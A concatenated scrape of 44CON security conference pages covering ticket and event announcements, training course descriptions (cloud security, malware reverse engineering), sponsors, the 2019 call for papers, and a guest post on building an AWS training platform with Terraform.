Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

#####EOF##### Cloud Security and DevSecOps Workshop – 44CON

Cloud Security and DevSecOps Workshop

Presented By: Paul Schwarzenberger

Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated to continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

The 2 day course will take place on the 6th & 7th June 2019 in London.
The price is £1,300 (inc VAT). Book your place in our shop now.

Learning Objectives

  • Knowledge of AWS and Azure services, secure architectures and best practice
  • Hands-on experience of AWS and Azure security features and services
  • Understanding DevSecOps approaches, technologies and tools
  • Practical use of CI/CD pipelines incorporating security testing
  • Container and serverless architectures, security issues and controls

Course Outline

Day 1:

  • Introduction and cloud concepts
  • AWS core services
  • AWS lab – build serverless web site using CloudFormation template
  • AWS security services
  • Azure core services
  • Azure lab – deploy infrastructure and implement security improvements

Day 2:

  • Azure security services
  • Continuous compliance and automated assessment tools
  • Continuous compliance lab – assess security of an AWS account
  • Container concepts, architectures and container security
  • Serverless architectures, serverless functions, security risks and best practice
  • DevOps and DevSecOps
  • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

Target Audience

Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

Student Requirements

No particular experience required, however any knowledge of cloud will be beneficial.

What to Bring

  • Laptop with Amazon Workspaces client installed (see below)
  • Mobile phone (for authenticator app)

Software Requirements

Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

 

 

 

 

 

 

 

Also please install the Google Authenticator app on your smartphone.

Students will be provided with

Amazon Workspaces virtual desktops for the labs, with all necessary software and tools preinstalled

AWS, Azure and GitHub credentials to be used responsibly during the course

Electronic copies of the course presentations, electronic and paper copies of lab guides

About the Trainer

Instructor – Paul Schwarzenberger @paulschwarzen

Paul is a cloud security architect and DevSecOps specialist with over 15 years experience leading a wide range of security related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.  

Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

Recent conference presentations include:

• Security BSides London 2018 – How to take over a production system in the cloud
• DevSecCon London 2018 – A journey to continuous cloud compliance
• IISP CrestCON 2018 – Why cloud security is different

Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

Book your 44CON June 2019 training course now!

#####EOF##### 44CON CFP 2019

44CON 2019 Call For Papers

This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of September, 2019 at the ILEC Conference Centre, Lille Road, London. We invite jaded cynics, pessimists, optimists and opportunists to come together and join our broad church where the latest research of the day will be discussed, debated and debased.

44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup on the evening of Thursday 12th September, which will feature it's own separately organised talks. The CFP covers the two main talks and workshop tracks only.

Purchase early bird tickets (capped at 50) or sign up to our mailing list to be notified when regular tickets go on sale.

If you have any pressing queries or concerns, please get in touch.

Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

  • A presentation on the main tracks is in front of a seated audience.
  • A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local privilege escalation opportunities.

Talks are filmed. Workshops are not.

In particular, we are looking for original talks of the highest quality in the following areas:-

Note: this is not an exhaustive list. If you have a good talk proposal, please submit it for consideration.

  • Offensive security talks for the advanced Pentester or Red Teamer
  • Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders
  • Talks on bugs, bug classes, finding and fixing security bugs
  • Incident Handling, Forensics and Anti-Forensics
  • Virtualisation, Container, and Cloud Computing Security
  • Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu
  • Hardware attacks and defence tools, techniques and practices
  • Application and Mobile Security
  • Networking, Comms, Critical National Infrastructure (CNI)
  • Cyberspace, Policing, Law, Interception and Human Rights

Priority is generally given to new presentations over those presented elsewhere. If you have a presentation that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let us know in your submission, and inform us of any changes you intend to make for 44CON London.

If your talk or workshop is new, please let us know the details of other conference(s) to which you have or intend to submit through the CFP system.

It's extremely hard for a talk to get accepted to 44CON because of the small number of slots compared to the volume of high quality submissions. If your submission is not accepted, it's not a rejection of you as a speaker (except in extreme cases, in which case we'll tell you). To boost your chances, take a look at how to game the CFP and some detail on how our CFP process works.

All 44CON speakers will be entitled to the following:

  • 2-3 nights accommodation (see below)
  • Breakfast & Lunch during conference
  • Love and TLC from our awesome speaker ops team
  • Event access for both days, all nights and pre/post event drinks
  • This year we're running a Speaker's English Wine tasting (yes, you read that right) session
  • We also have a small event on the Tuesday evening that speakers are welcome to attend

Accepted primary presentation speakers get the following:

  • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
  • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)

Accepted primary presentation speakers also presenting a workshop get the following:

  • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
  • 3 nights of accommodation for the primary speaker (normally the Wednesday,Thursday and Friday nights)

Accepted primary workshop presenters without an associated talk get the following:

  • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)
  • Travel is not covered

In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and more.

We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and Gluten-free friendly event. Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help arrange for tourist things for you and your partners to do while in London. Please let us know should you want to do this, so we can make your time here memorable.

Official CFP open:Tuesday 26th February 2019
Final CFP deadline:Tuesday 30th April 2019, 23:59pm UTC
First accept notifications:Monday 27th May 2019
Speaker notifications start:Monday 3rd June 2019
Speaker announcements start:Wednesday 5th June 2019 @ BSides London 2019
Speaker flight details to be submitted by:Friday 19th July, 2019
Papers/Tools/Presentation submission deadline:Friday 30th August 2019
44CON Training9th-11th September 2019
44CON Conference11th-13th September 2019
#####EOF##### Sense/Net | 44CON Schwag




#####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by Hashicorp, as it’s ideal for automating infrastructure as code:

Here’s an example of the code snippet used to create the AWS Directory service:

My terraform code included nearly all the required resources:

  • VPC, DMZ and private subnets in multiple availability zones, subnet routes
  • Network Address Translation (NAT) gateways and Internet gateway
  • Key and key alias in AWS Key Management Service
  • Virtual machine instance for Active Directory admin, security group and Elastic IP
  • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
  • Identity and Access Management (IAM) policy and role for AD admin virtual machine
  • AWS System Manager templates for domain join and Windows feature setup
  • Secrets in AWS Secret Manager for user passwords – more on this later

The one exception is Amazon Workspaces, as these are not supported by Terraform at the time of writing.

I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

Opening Active Directory Users and Computers, I could see the AWS Directory domain.

All I needed now was some automation scripts to create users, and then build the Amazon Workspaces. I’ll cover these in my next post.

#####EOF##### Malware Reverse Engineering – 44CON

Malware Reverse Engineering

Presented By: Joxean Koret

This course provides effective knowledge and hands-on experience on basic malware analysis. It introduces current and relevant techniques that will prepare students to become a proficient malware researcher heavily using IDA Pro.

This 2 day course will take place on the 11th & 12th March 2019 in London.
The price is £1,300 (inc VAT). Book your place in our shop now.

Learning Objectives

  • Understand Windows fundamentals
  • Develop reverse engineering skills
  • Gain familiarity with standard tools like IDA and Volatility
  • Reverse engineer real-world malware

Course Outline

Day 1:

  • Introduction to malware
  • Windows fundamentals
  • Executable file formats (PE)
  • Introduction to reverse engineering
  • Introduction
  • Tools & setting up a reverse engineering lab.
  • Brief Introduction to Graph theory
  • Static Analysis: from C to assembler
  • Manual Code reconstruction: from (any) assembler to C

Day 2:

  • Unpacking
  • Static unpacking
  • IDAPython.
  • Hands on various malwares.
  • Dynamic unpacking
  • Manual reconstruction
  • IDA Python batch automation
  • Memory dumping and analysis with volatility

Target Audience

Security staff working in, or looking to work in blue teams on malware analysis, and those with a keen interest in reverse engineering, but without the free time dedicated to developing their skills.

Student Requirements

  • Knows C
  • Knowledge of assembly language (x86, ARM, …) is advantageous but isn’t required

What to Bring

  • A working laptop (no Netbooks, no Tablets, no iPads)
  • Intel Core i3 (equivalent or superior) required
  • 8GB RAM required, at a minimum
  • Wireless network card
  • 60 GB free Hard disk space
  • If you’re using a Macbook or Macbook Pro, please bring your dongles!

Software Requirements

  • Ubuntu Linux installed either on the laptop or on a VM
  • Microsoft Windows as a VM
  • Legal version of IDA (7.0 or higher)

Students will be provided with

Copies of the course including all exercises and Virtual Machine images used during the course.

About the Trainer

LEAD INSTRUCTOR – Joxean Koret @matalaz

Joxean Koret has been working for more than 15 years in many different computing areas. He started working as database software developer and DBA for a number of different RDBMS.

Afterwards he got interested in reverse engineering and applied this knowdlege to the DBs he was working with, for which he has discovered dozens of vulnerabilities in products from the major database vendors, specially in Oracle software.

He also worked in other security areas like malware analysis and anti-malware software development for an Antivirus company or developing IDA Pro at Hex-Rays.

Book your 44CON Spring 2019 training course now!

#####EOF##### 44CON Sponsors – 44CON

44CON Sponsors

If you would like to sponsor 44CON 2019, our 44CON 2019 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

Last year’s sponsors, at 44CON 2018.

 

Gold Sponsors

BT

www.bt.com

HackerOne

www.hackerone.com

Tenable

www.tenable.com

Silver Sponsors

Microsoft

www.microsoft.com

 

Crowdfense

www.crowdfense.com

 

Exhibitors

Bugcrowd

www.bugcrowd.com

Botprobe

botprobe.co.uk

Google

Google

google.com

Tigerscheme

www.tigerscheme.org

Twitter: @tiger_scheme

CheckSec

www.checksec.com

SuperAwesome

www.superawesome.tv

safepass.me

safepass.me

Cortex Insight

cortexinsight.com

Event Supporters

Integrity

www.integrity.pt

Community Sponsors
crest-new

CREST

www.crest-approved.org

ISSA-UK

ISSA-UK

www.issa.org

RawHex

rawhex.com

OWASP

www.owasp.org

Event Partners
#####EOF##### early-bird – 44CON

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### 44CON 2019 Early-Bird Tickets are now on sale – 44CON

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### stevelord – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

#####EOF##### crestcon – 44CON
#####EOF##### training – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

#####EOF##### 44CON 2019 CFP Now Open – 44CON

44CON 2019 CFP Now Open

The Call For Papers for 44CON 2019 is now open. Submissions will be gratefully received on our CFP System. We’re interested in receiving submissions for workshops and talks.

The CFP covers our two dedicated talk tracks and our workshop track. There will also be an expo track in our village hall, as well as events in the mental health hackers village, and the village pub including the ManyHats club meetup on the Thursday evening, but these are not covered by the CFP process.

Talking slots are 45 minutes long, while workshops are 1 or 2 hours in length. Each submitter will receive individually collated and hand-typed artesanal feedback from Steve, our blackmailCFP admin via email.

As usual, speakers from outside of Fulham, Putney or Zone 1 will have their travel and accommodation covered by us. Our CFP notice below provides further details on how this all works, and what accepted speakers receive. If you’re interested in submitting, read the CFP notice below, and check out our 2017 guide to gaming the 44CON CFP.

44CON is the UK's premier annual technical security conference and training event. From the evening of the
11th of September till the 13th of September 2019, expect a top-tier international technical conference
with fast wifi, loose 0day, a village pub and of course, Gin O'Clock.

       __ __  __ __  __________  _   __   
      / // / / // / / ____/ __ \/ | / / | "You can hack us
     / // /_/ // /_/ /   / / / /  |/ /  |  You can breach us
    /__  __/__  __/ /___/ /_/ / /|  /   |  But you'll have to answer to
      /_/    /_/  \____/\____/_/ |_/    |  Oh, the pwns of Brompton"

-o-     Straight Outta Brompton     -o- | 11th - 13th September 2019
-o- As monitored by the famous GCHQ -o- | ILEC, 47 Lillie Rd, London SW6 1UD

]-- 44CON 2019 Call For Papers

Site: https://44con.com/
CFP: https://cfp.44con.com/
Tickets *available now*: https://shop.44con.com/

This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of
September, 2019. We invite jaded cynics, pessimists, optimists and opportunists to come together and join
our broad church where the latest research of the day will be discussed, debated and debased.

44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo
track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup
on the evening of Thursday 12th September, which will feature it's own talks. The CFP covers the two main
talks and workshop tracks only.

Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations
are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

* A presentation on the main tracks is in front of a seated audience.
* A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local
privilege escalation opportunities.

Talks are filmed. Workshops are not.

This is NOT a call for training. Training takes place separately, see here for details:
44CON Training
At the time of writing September's training slots are full, but we are accepting expressions of interest for our December and Spring 2020 training sessions. ]-- Submissions Submissions should be sent via the CFP website https://cfp.44con.com/. Submissions sent via email, post or RFC1149 compliant avian carrier will not be accepted. In particular, we are looking for original talks of the highest quality in the following (but not exclusive) areas: * Offensive security talks for the advanced Pentester or Red Teamer * Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders * Talks on bugs, bug classes, finding and fixing security bugs * Incident Handling, Forensics and Anti-Forensics * Virtualisation, Container and Cloud Computing Security * Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu * Hardware attacks and defence tools, techniques and practices * Application and Mobile Security * Networking, Comms, Critical National Infrastructure (CNI) * Cyberspace, Policing, Law, Interception and Human Rights Note: this is not an exhaustive list. If you have what you think is a good talk proposal, please submit it through the CFP system. Priority is generally given to new presentations over those presented elsewhere. If you have a presentation that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let us know in your submission, and inform us of any changes you intend to make for 44CON London. If your talk or workshop is new, please let us know the details of other conference(s) to which you have or intend to submit through the CFP system. ]-- Maximising your odds of getting selected Some information on how our CFP process works is here:
The 44CON CFP just closed. You won’t believe what happens next.
Some tips on how to game the process are available here:
How to game the 44CON CFP
Your submission will be up against over 200 others competing for about 20 talking slots. Our 20 reviewers from around the globe vote based on what they can see. After the CFP closes, Steve collates the feedback and individually emails each submitter personally. We expect accepted submissions to score an *average* of 4.25/5 or higher. This means that perfectly good talks don't get selected. If this happens to you, please don't be upset. Not getting into 44CON is a badge of honour, and comes with (hopefully) useful feedback for you to try again some other time. ]-- Speaker McPrivilegesFace All speakers at 44CON London will be entitled to the following: * 2-3 nights accommodation (see below) * Breakfast & Lunch during conference * Love and TLC from our awesome speaker ops team * Event access for both days, all nights and pre/post event drinks * This year we're running a Speaker's English Wine tasting (yes, you read that right) session * We also have a small event on the Tuesday evening that speakers are welcome to attend Accepted primary presentation speakers get the following: * Paid travel (for primary speaker outside of Fulham, Putney or Central London) * 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights) Accepted primary presentation speakers also presenting a workshop get the following: * Paid travel (for primary speaker outside of Fulham, Putney or Central London) * 3 nights of accommodation for the primary speaker (normally the Wednesday,Thursday and Friday nights) Accepted primary workshop presenters without an associated talk get the following: * 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights) * Travel is not covered We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and Gluten-free friendly event. Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help arrange for tourist things for you and your partners to do while in London. Please let us know should you want to do this, so we can make your time memorable. In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and more. ]-- Submissions process Submit your CFP response at the CFP Site https://cfp.44con.com/. Submissions must be in English only. Please ensure that your home country is specified in your submission, so we know where to fly you in from. Please do not email or message the crew with submissions - they will not be accepted. If you are submitting a workshop proposal, please provide details of attendee requirements such as minimum technical knowledge, hardware/software required etc. ]-- Important dates * CFP Opens Thursday 26th February * CFP Closes 23:59:59 BST 30th April * First round speaker announcements start Monday 3rd June * Final Speaker announcements: Tuesday 18th June * Speaker flight details to be submitted by 19th July * Papers/Tools/Presentation Submission Deadline: Friday 30th August * 44CON London Training: 9th/10th/11th September * 44Café evening event: 10th September * 44CON London Conference: 11th, 12th and 13th September ]-- Other Information To find out more about 44CON London visit http://44con.com/, follow us on twitter @44CON, or use the #44CON hashtag and take part in the discussion on Twitter. Tickets are available now from the main web site at https://shop.44con.com/. For an idea of what to expect, watch some videos from previous 44CON Events at https://www.youtube.com/44contv By agreeing to speak at 44CON 2019 you are granting Sense/Net Ltd (owners of 44CON) the rights to reproduce and distribute your presentation and recording (unless otherwise agreed in writing in advance of the event) including but not limited to http://44con.com/, advertisements in various mediums and through partner sites and mediums. If you are not comfortable with this arrangement then this must be agreed with us in writing prior to the event. It is imperative that, once you have agreed to speak at 44CON 